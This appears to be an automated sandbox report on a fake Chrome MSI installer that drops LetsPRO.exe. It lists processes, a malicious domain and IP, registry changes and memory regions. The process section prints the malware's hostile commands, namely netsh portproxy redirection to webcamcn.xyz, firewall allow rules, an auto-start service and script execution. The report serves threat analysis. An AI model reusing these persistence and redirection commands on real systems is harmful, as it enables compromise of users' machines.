"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
 malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Windows\System32\cscript.exe
cscript C:\Users\user\99944\144977.vbs
 malicious
C:\Windows\System32\cscript.exe
cscript C:\Users\user\99944\144977.vbs
 malicious
C:\Windows\System32\netsh.exe
netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443
 malicious
C:\Windows\System32\netsh.exe
netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Windows\System32\netsh.exe
netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"
 malicious
C:\Windows\System32\netsh.exe
netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"
 malicious
C:\Windows\System32\netsh.exe
netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"
 malicious
C:\Windows\System32\netsh.exe
netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80
 malicious
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sutup-Chrome.13.26.x64.msi"
C:\Windows\System32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F88407A7EB4CD1FAACECE5C8A82A6774
C:\Windows\System32\cmd.exe
cmd /c cscript C:\Users\user\99944\144977.vbs
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe cscript C:\Users\user\99944\144977.vbs
C:\Windows\System32\sc.exe
sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144
C:\Windows\System32\taskkill.exe
taskkill /f /t /im wegame.exe
C:\Windows\System32\taskkill.exe
taskkill /f /t /im WeGame.exe
There are 35 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://dl.google.com/update2/installers/icons/https://m.google.com/devicemanagement/data/apiLastCod
unknown
https://www.google.com/support/installer/?
unknown
https://m.google.com/devicemanagement/data/api
unknown

Domains

Name
IP
Malicious
156.248.54.11.webcamcn.xyz
156.248.54.11
 malicious

IPs

IP
Domain
Country
Malicious
156.248.54.11
156.248.54.11.webcamcn.xyz
Seychelles
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\5bb04c.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\5bb04c.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Microsoft\Installer\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\3AB66307F01A76C4CAA8D4EFB52E7DDF
572D6E627CF32A148B2C54B83609922D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\C04682BDF1968B246A5146D4AC20303A
572D6E627CF32A148B2C54B83609922D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\1F595A8DDA9436C4DB85595E479F9726
572D6E627CF32A148B2C54B83609922D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\E597F4AAB76E519408301F451809CE15
572D6E627CF32A148B2C54B83609922D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\39817EE0E90E1F740BB90F2F4AD09E34
572D6E627CF32A148B2C54B83609922D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Program Files (x86)\WeGame\
HKEY_CURRENT_USER\SOFTWARE\Google\{5E4E6E84-1289-4C07-9813-C6AA1F6D7FF2}
AI_INSTALLPERUSER
HKEY_CURRENT_USER\SOFTWARE\Caphyon\Advanced Installer\Scheduled Tasks\{5E4E6E84-1289-4C07-9813-C6AA1F6D7FF2}
Update
HKEY_CURRENT_USER\SOFTWARE\Caphyon\Advanced Installer\Scheduled Tasks\{5E4E6E84-1289-4C07-9813-C6AA1F6D7FF2}
Update_ID
HKEY_CURRENT_USER\Console\0
d33f351a4aeea5e608853d1a56661059
HKEY_LOCAL_MACHINE\SOFTWARE
IpDates_info
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
Version
HKEY_CURRENT_USER\Console\0
d33f351a4aeea5e608853d1a56661059
HKEY_LOCAL_MACHINE\SOFTWARE
IpDates_info
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}
iid
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update
uid
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update
uid-create-time
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update
uid-num-rotations
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\uid
7PS7Vw3J
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\PersistedPings\{34E166A1-9B3F-4B28-9586-72492EFE553B}
PersistedPingString
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\PersistedPings\{34E166A1-9B3F-4B28-9586-72492EFE553B}
PersistedPingTime
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}
usagestats
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}
pv
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}
name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}
pv
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update
version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\MPRAPI
FileDirectory
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp
*/443
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp
*/80
There are 35 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
10020000
direct allocation
page read and write
 malicious
10020000
direct allocation
page read and write
 malicious
10020000
direct allocation
page read and write
 malicious
10020000
direct allocation
page read and write
 malicious
10020000
direct allocation
page read and write
 malicious
10020000
direct allocation
page read and write
 malicious
10020000
direct allocation
page read and write
 malicious
10020000
direct allocation
page read and write
 malicious
10020000
direct allocation
page read and write
 malicious
10020000
direct allocation
page read and write
 malicious
10020000
direct allocation
page read and write
 malicious
10020000
direct allocation
page read and write
 malicious
10020000
direct allocation
page read and write
 malicious
5510000
trusted library allocation
page read and write
BB8000
heap
page read and write
591D000
heap
page read and write
2059000
heap
page read and write
3AF0000
direct allocation
page read and write
2ED0000
trusted library allocation
page read and write
5802000
heap
page read and write
400000
unkown
page readonly
4A4000
heap
page read and write
280000
unkown
page readonly
BB4000
heap
page read and write
37F0000
trusted library allocation
page read and write
BC8000
heap
page read and write
1006B000
direct allocation
page execute read
69E000
stack
page read and write
BB4000
heap
page read and write
26A0000
direct allocation
page read and write
2059000
heap
page read and write
113CA62A000
heap
page read and write
BC4000
heap
page read and write
1006B000
direct allocation
page execute read
4A4000
heap
page read and write
402000
unkown
page readonly
BC3000
heap
page read and write
BB4000
heap
page read and write
4F2E000
heap
page read and write
BB8000
heap
page read and write
401000
unkown
page execute read
10630000
direct allocation
page read and write
614000
heap
page read and write
BAF000
heap
page read and write
10000000
direct allocation
page read and write
3AF4000
direct allocation
page execute and read and write
138F8E9E000
heap
page read and write
4F81000
heap
page read and write
2BEF000
stack
page read and write
5194000
heap
page read and write
2041000
heap
page read and write
31C000
stack
page read and write
BA2000
heap
page read and write
4F20000
heap
page read and write
43D0000
trusted library allocation
page read and write
26E0000
trusted library allocation
page read and write
2180000
direct allocation
page read and write
390000
heap
page read and write
BAF000
heap
page read and write
295F000
heap
page read and write
26E0000
trusted library allocation
page read and write
6C9A6000
unkown
page write copy
BC4000
heap
page read and write
280000
unkown
page readonly
26F0000
direct allocation
page read and write
BB4000
heap
page read and write
6C9A6000
unkown
page write copy
22CF000
stack
page read and write
BB8000
heap
page read and write
21F0000
heap
page read and write
5185000
heap
page read and write
37F0000
trusted library allocation
page read and write
BAF000
heap
page read and write
BC3000
heap
page read and write
2171000
heap
page read and write
BC3000
heap
page read and write
1F31000
heap
page read and write
5510000
trusted library allocation
page read and write
26E0000
trusted library allocation
page read and write
BC8000
heap
page read and write
6C8F0000
unkown
page readonly
430000
heap
page read and write
5911000
heap
page read and write
662000
heap
page read and write
113CA641000
heap
page read and write
470000
heap
page read and write
6C9A6000
unkown
page write copy
BA5000
heap
page read and write
AF0000
heap
page read and write
4A4000
heap
page read and write
2180000
direct allocation
page read and write
4E4000
heap
page read and write
400000
unkown
page readonly
2041000
heap
page read and write
BC3000
heap
page read and write
2041000
heap
page read and write
BAF000
heap
page read and write
29000
unkown
page readonly
5D4000
heap
page read and write
251000
unkown
page execute read
1006B000
direct allocation
page execute read
251000
unkown
page execute read
4F22000
heap
page read and write
1F0000
heap
page read and write
401000
unkown
page execute read
5510000
trusted library allocation
page read and write
3420000
direct allocation
page read and write
6C9A6000
unkown
page write copy
10000000
direct allocation
page read and write
400000
unkown
page readonly
2180000
direct allocation
page read and write
5510000
trusted library allocation
page read and write
BB4000
heap
page read and write
570000
heap
page read and write
250000
unkown
page readonly
1001E000
direct allocation
page readonly
2059000
heap
page read and write
3420000
direct allocation
page read and write
564000
heap
page read and write
3000000
heap
page read and write
2041000
heap
page read and write
554000
heap
page read and write
138F8E6F000
heap
page read and write
BB4000
heap
page read and write
BB4000
heap
page read and write
400000
unkown
page readonly
39B0000
direct allocation
page read and write
6C9A4000
unkown
page read and write
5E9000
heap
page read and write
138F8E40000
heap
page read and write
1060000
heap
page read and write
11DD9FE000
stack
page read and write
2F3F000
heap
page read and write
1FD1000
heap
page read and write
26E0000
trusted library allocation
page read and write
BC4000
heap
page read and write
32000
unkown
page readonly
BC4000
heap
page read and write
11DD5FF000
stack
page read and write
50B000
stack
page read and write
26F08FA000
stack
page read and write
1F00000
heap
page read and write
25C0000
direct allocation
page read and write
250000
unkown
page readonly
B08000
heap
page read and write
19D000
stack
page read and write
37F0000
trusted library allocation
page read and write
2030000
heap
page read and write
402000
unkown
page readonly
19AF000
stack
page read and write
584000
heap
page read and write
BAF000
heap
page read and write
250000
unkown
page readonly
37F0000
trusted library allocation
page read and write
22B0000
heap
page read and write
37F0000
trusted library allocation
page read and write
BC3000
heap
page read and write
19D000
stack
page read and write
37F0000
trusted library allocation
page read and write
402000
unkown
page readonly
BB8000
heap
page read and write
26E0000
trusted library allocation
page read and write
CBC000
stack
page read and write
19D000
stack
page read and write
1009A000
direct allocation
page execute read
64F000
stack
page read and write
250000
unkown
page readonly
5D0000
heap
page read and write
63B000
heap
page read and write
2201000
heap
page read and write
26A0000
direct allocation
page read and write
659000
heap
page read and write
B97000
heap
page read and write
BA5000
heap
page read and write
2041000
heap
page read and write
BB8000
heap
page read and write
BC8000
heap
page read and write
6AF000
heap
page read and write
6CB000
heap
page read and write
4E4000
heap
page read and write
5510000
trusted library allocation
page read and write
5510000
trusted library allocation
page read and write
11DD8FF000
stack
page read and write
2000000
trusted library allocation
page read and write
BAF000
heap
page read and write
736000
stack
page read and write
2030000
heap
page read and write
E00000
heap
page read and write
402000
unkown
page readonly
113CA648000
heap
page read and write
2041000
heap
page read and write
4A0000
heap
page read and write
2953000
heap
page read and write
BC3000
heap
page read and write
BB4000
heap
page read and write
37F0000
trusted library allocation
page read and write
608E000
heap
page read and write
5580000
heap
page read and write
BC3000
heap
page read and write
25F0000
trusted library allocation
page read and write
2041000
heap
page read and write
BC3000
heap
page read and write
620000
heap
page read and write
6C9A9000
unkown
page readonly
5510000
trusted library allocation
page read and write
2041000
heap
page read and write
2041000
heap
page read and write
500000
heap
page read and write
56E000
stack
page read and write
78E000
heap
page read and write
B8D000
heap
page read and write
B39000
heap
page read and write
1F0000
heap
page read and write
2160000
heap
page read and write
BB8000
heap
page read and write
1009A000
direct allocation
page execute read
400000
unkown
page readonly
2180000
heap
page read and write
401000
unkown
page execute read
10094000
direct allocation
page read and write
1E4000
heap
page read and write
B8B000
heap
page read and write
402000
unkown
page readonly
BB8000
heap
page read and write
27D000
unkown
page read and write
BC3000
heap
page read and write
6C8F0000
unkown
page readonly
113CA5E0000
heap
page read and write
D90000
heap
page read and write
BA5000
heap
page read and write
429D000
stack
page read and write
2622000
heap
page read and write
1001E000
direct allocation
page readonly
7A0000
heap
page read and write
27D000
unkown
page write copy
250000
unkown
page readonly
BAF000
heap
page read and write
26E0000
trusted library allocation
page read and write
2059000
heap
page read and write
6C8F0000
unkown
page readonly
37F0000
trusted library allocation
page read and write
3AF0000
direct allocation
page read and write
5802000
heap
page read and write
2325000
heap
page read and write
554000
heap
page read and write
71A000
heap
page read and write
2041000
heap
page read and write
400000
unkown
page readonly
BC4000
heap
page read and write
4CCE000
stack
page read and write
122E000
stack
page read and write
280000
unkown
page readonly
9B000
stack
page read and write
26A0000
direct allocation
page read and write
5D4000
heap
page read and write
6CC91000
unkown
page execute read
BB4000
heap
page read and write
BB4000
heap
page read and write
400000
unkown
page readonly
65D000
heap
page read and write
251000
unkown
page execute read
6C9A9000
unkown
page readonly
1F69000
heap
page read and write
BA5000
heap
page read and write
BB4000
heap
page read and write
43A000
heap
page read and write
10000000
direct allocation
page read and write
4060000
heap
page read and write
59B3000
heap
page read and write
2041000
heap
page read and write
138F8E5B000
heap
page read and write
138F8E48000
heap
page read and write
3F30000
direct allocation
page execute and read and write
280000
unkown
page readonly
50CB000
heap
page read and write
4B4000
heap
page read and write
2060000
trusted library allocation
page read and write
251000
unkown
page execute read
26E0000
trusted library allocation
page read and write
11000
unkown
page execute read
2059000
heap
page read and write
2041000
heap
page read and write
BAC000
heap
page read and write
584000
heap
page read and write
BC3000
heap
page read and write
4F6E000
heap
page read and write
BAC000
heap
page read and write
4063000
heap
page read and write
BC8000
heap
page read and write
BB4000
heap
page read and write
BAF000
heap
page read and write
129E000
heap
page read and write
BC3000
heap
page read and write
2041000
heap
page read and write
5085000
heap
page read and write
2041000
heap
page read and write
B97000
heap
page read and write
5510000
trusted library allocation
page read and write
BC3000
heap
page read and write
2059000
heap
page read and write
5185000
heap
page read and write
59B3000
heap
page read and write
2041000
heap
page read and write
630000
heap
page read and write
5F1D000
heap
page read and write
2190000
heap
page read and write
26E0000
trusted library allocation
page read and write
56CE000
stack
page read and write
537D000
stack
page read and write
BF0000
heap
page read and write
2059000
heap
page read and write
19D000
stack
page read and write
BB8000
heap
page read and write
26E0000
trusted library allocation
page read and write
83F000
stack
page read and write
1006B000
direct allocation
page execute read
26E0000
trusted library allocation
page read and write
BB4000
heap
page read and write
6C9A9000
unkown
page readonly
B4E000
heap
page read and write
1290000
heap
page read and write
BA5000
heap
page read and write
F0C000
stack
page read and write
402000
unkown
page readonly
9B000
stack
page read and write
BA2000
heap
page read and write
5FD000
heap
page read and write
4B4000
heap
page read and write
BA2000
heap
page read and write
B88000
heap
page read and write
544000
heap
page read and write
646000
heap
page read and write
20D0000
trusted library allocation
page read and write
4E4000
heap
page read and write
BB8000
heap
page read and write
27D000
unkown
page read and write
6C9A6000
unkown
page write copy
B99000
heap
page read and write
5510000
trusted library allocation
page read and write
5981000
heap
page read and write
15BA000
heap
page read and write
24AE000
stack
page read and write
446000
heap
page read and write
5185000
heap
page read and write
37F0000
trusted library allocation
page read and write
28DD000
heap
page read and write
BC3000
heap
page read and write
113CA7C0000
heap
page read and write
2041000
heap
page read and write
29AF000
stack
page read and write
BA5000
heap
page read and write
AD8000
heap
page read and write
564000
heap
page read and write
5F1D000
heap
page read and write
2059000
heap
page read and write
26D000
unkown
page readonly
BC3000
heap
page read and write
78E000
heap
page read and write
614000
heap
page read and write
1F0000
heap
page read and write
138F8E9D000
heap
page read and write
FB0000
heap
page read and write
10094000
direct allocation
page read and write
2041000
heap
page read and write
6C9A6000
unkown
page write copy
BAC000
heap
page read and write
1FD8000
heap
page read and write
1009A000
direct allocation
page execute read
6071000
heap
page read and write
5B0000
trusted library allocation
page read and write
113CA651000
heap
page read and write
10630000
direct allocation
page read and write
608E000
heap
page read and write
280000
unkown
page readonly
3F2E000
stack
page read and write
280000
unkown
page readonly
401000
unkown
page execute read
400000
unkown
page readonly
113CA623000
heap
page read and write
BAC000
heap
page read and write
65D000
heap
page read and write
59B3000
heap
page read and write
BB8000
heap
page read and write
12FC000
stack
page read and write
F60000
heap
page read and write
2F01000
heap
page read and write
5C0000
trusted library allocation
page read and write
82F000
stack
page read and write
1F91000
heap
page read and write
21B0000
heap
page read and write
2D30000
heap
page read and write
2ED0000
trusted library allocation
page read and write
659000
heap
page read and write
1FBB000
heap
page read and write
656000
heap
page read and write
1009A000
direct allocation
page execute read
BA5000
heap
page read and write
113CA628000
heap
page read and write
5F0000
heap
page read and write
4F6E000
heap
page read and write
138F8E9F000
heap
page read and write
BBA000
heap
page read and write
402000
unkown
page readonly
B5A000
heap
page read and write
BA5000
heap
page read and write
BB1000
heap
page read and write
26D0000
heap
page read and write
6C9A9000
unkown
page readonly
132F000
stack
page read and write
5510000
trusted library allocation
page read and write
6CE05000
unkown
page readonly
BAF000
heap
page read and write
204F000
heap
page read and write
138F8E93000
heap
page read and write
37F0000
trusted library allocation
page read and write
9B000
stack
page read and write
75F000
stack
page read and write
280000
unkown
page readonly
400000
unkown
page readonly
4AE000
stack
page read and write
BB8000
heap
page read and write
26A0000
direct allocation
page read and write
614000
heap
page read and write
37F0000
trusted library allocation
page read and write
124E000
stack
page read and write
402000
unkown
page readonly
4E4000
heap
page read and write
5510000
trusted library allocation
page read and write
401000
unkown
page execute read
250000
unkown
page readonly
38F0000
heap
page read and write
6070000
heap
page read and write
2360000
heap
page read and write
566000
heap
page read and write
27D000
unkown
page write copy
5510000
trusted library allocation
page read and write
2280000
heap
page read and write
78E000
heap
page read and write
1006B000
direct allocation
page execute read
2059000
heap
page read and write
26E0000
trusted library allocation
page read and write
2140000
heap
page read and write
3C0000
heap
page read and write
780000
heap
page read and write
251000
unkown
page execute read
4D4C000
stack
page read and write
138F8E7A000
heap
page read and write
1009A000
direct allocation
page execute read
251000
unkown
page execute read
BC8000
heap
page read and write
5510000
trusted library allocation
page read and write
BC3000
heap
page read and write
4A0000
heap
page read and write
554000
heap
page read and write
5D4000
heap
page read and write
27D000
unkown
page write copy
6080000
heap
page read and write
1006B000
direct allocation
page execute read
6D6000
heap
page read and write
6CE69000
unkown
page readonly
26A0000
direct allocation
page read and write
5510000
trusted library allocation
page read and write
6C9A6000
unkown
page write copy
BC4000
heap
page read and write
27D000
unkown
page write copy
2059000
heap
page read and write
51E000
stack
page read and write
BC3000
heap
page read and write
2041000
heap
page read and write
66F000
stack
page read and write
7CF000
stack
page read and write
5911000
heap
page read and write
5E7000
heap
page read and write
402000
unkown
page readonly
659000
heap
page read and write
1001E000
direct allocation
page readonly
138F8E97000
heap
page read and write
4B4000
heap
page read and write
19D000
stack
page read and write
622000
heap
page read and write
4F6E000
heap
page read and write
26E0000
trusted library allocation
page read and write
B24000
heap
page read and write
B4D000
heap
page read and write
4B4000
heap
page read and write
564000
heap
page read and write
1F30000
heap
page read and write
1F0000
heap
page read and write
B56000
heap
page read and write
1F0000
heap
page read and write
26E0000
trusted library allocation
page read and write
5080000
heap
page read and write
5802000
heap
page read and write
5F10000
heap
page read and write
BA5000
heap
page read and write
9C000
stack
page read and write
A9F000
stack
page read and write
BAF000
heap
page read and write
59B3000
heap
page read and write
401000
unkown
page execute read
2041000
heap
page read and write
10630000
direct allocation
page read and write
BB4000
heap
page read and write
113CA652000
heap
page read and write
2041000
heap
page read and write
37F0000
trusted library allocation
page read and write
401000
unkown
page execute read
242F000
stack
page read and write
BC3000
heap
page read and write
26E0000
trusted library allocation
page read and write
5981000
heap
page read and write
2041000
heap
page read and write
B57000
heap
page read and write
614000
heap
page read and write
64B000
heap
page read and write
6C9A6000
unkown
page write copy
5D4000
heap
page read and write
401000
unkown
page execute read
401000
unkown
page execute read
2041000
heap
page read and write
4F6E000
heap
page read and write
2041000
heap
page read and write
138F8E8D000
heap
page read and write
BB1000
heap
page read and write
AD8000
heap
page read and write
6A0000
trusted library allocation
page read and write
26A0000
direct allocation
page read and write
37F0000
trusted library allocation
page read and write
148F000
stack
page read and write
BB8000
heap
page read and write
74F000
stack
page read and write
26A0000
direct allocation
page read and write
10630000
direct allocation
page read and write
1FF1000
heap
page read and write
5023000
heap
page read and write
BA5000
heap
page read and write
5023000
heap
page read and write
2090000
heap
page read and write
BB4000
heap
page read and write
400000
unkown
page readonly
2059000
heap
page read and write
AD8000
heap
page read and write
22B0000
heap
page read and write
2041000
heap
page read and write
6C9A4000
unkown
page read and write
138F8E25000
heap
page read and write
2040000
heap
page read and write
2F30000
heap
page read and write
6C8F0000
unkown
page readonly
2041000
heap
page read and write
10630000
direct allocation
page read and write
520000
heap
page read and write
3B20000
direct allocation
page read and write
2059000
heap
page read and write
BC3000
heap
page read and write
113CA5F0000
heap
page read and write
26A0000
direct allocation
page read and write
251000
unkown
page execute read
24A0000
heap
page read and write
113CA63C000
heap
page read and write
113CA64F000
heap
page read and write
4F2E000
heap
page read and write
2320000
heap
page read and write
80E000
stack
page read and write
510000
heap
page read and write
5A0000
heap
page read and write
113CB060000
heap
page read and write
2050000
heap
page read and write
1009A000
direct allocation
page execute read
9B000
stack
page read and write
5510000
trusted library allocation
page read and write
544000
heap
page read and write
27A0000
heap
page read and write
43CE000
stack
page read and write
37F0000
trusted library allocation
page read and write
32000
unkown
page readonly
129A000
heap
page read and write
402000
unkown
page readonly
26E0000
trusted library allocation
page read and write
2070000
heap
page read and write
61A000
heap
page read and write
59B3000
heap
page read and write
2A2B000
heap
page read and write
2170000
heap
page read and write
BA5000
heap
page read and write
E65000
unkown
page readonly
138F8E91000
heap
page read and write
330F000
stack
page read and write
2862000
heap
page read and write
402000
unkown
page readonly
400000
unkown
page readonly
2180000
direct allocation
page read and write
BC8000
heap
page read and write
1009A000
direct allocation
page execute read
25F0000
trusted library allocation
page read and write
624000
heap
page read and write
4D50000
direct allocation
page read and write
22DF000
stack
page read and write
26E0000
trusted library allocation
page read and write
65D000
heap
page read and write
21DE000
stack
page read and write
139F000
stack
page read and write
2F5F000
stack
page read and write
5DB000
heap
page read and write
68F000
stack
page read and write
9C000
stack
page read and write
2041000
heap
page read and write
401000
unkown
page execute read
37F0000
trusted library allocation
page read and write
4B4000
heap
page read and write
250000
unkown
page readonly
BB8000
heap
page read and write
29000
unkown
page readonly
5B70000
heap
page read and write
401000
unkown
page execute read
6C9A6000
unkown
page write copy
BC4000
heap
page read and write
BC3000
heap
page read and write
280000
unkown
page readonly
6C9A4000
unkown
page read and write
5185000
heap
page read and write
64B000
heap
page read and write
26E0000
trusted library allocation
page read and write
1FEA000
heap
page read and write
2041000
heap
page read and write
B8D000
heap
page read and write
1E4000
heap
page read and write
2080000
heap
page read and write
251000
unkown
page execute read
138F8EA2000
heap
page read and write
37F0000
trusted library allocation
page read and write
25D5000
direct allocation
page readonly
BAF000
heap
page read and write
26A0000
direct allocation
page read and write
3B20000
direct allocation
page read and write
402000
unkown
page readonly
39B0000
direct allocation
page read and write
BB8000
heap
page read and write
121000
unkown
page execute read
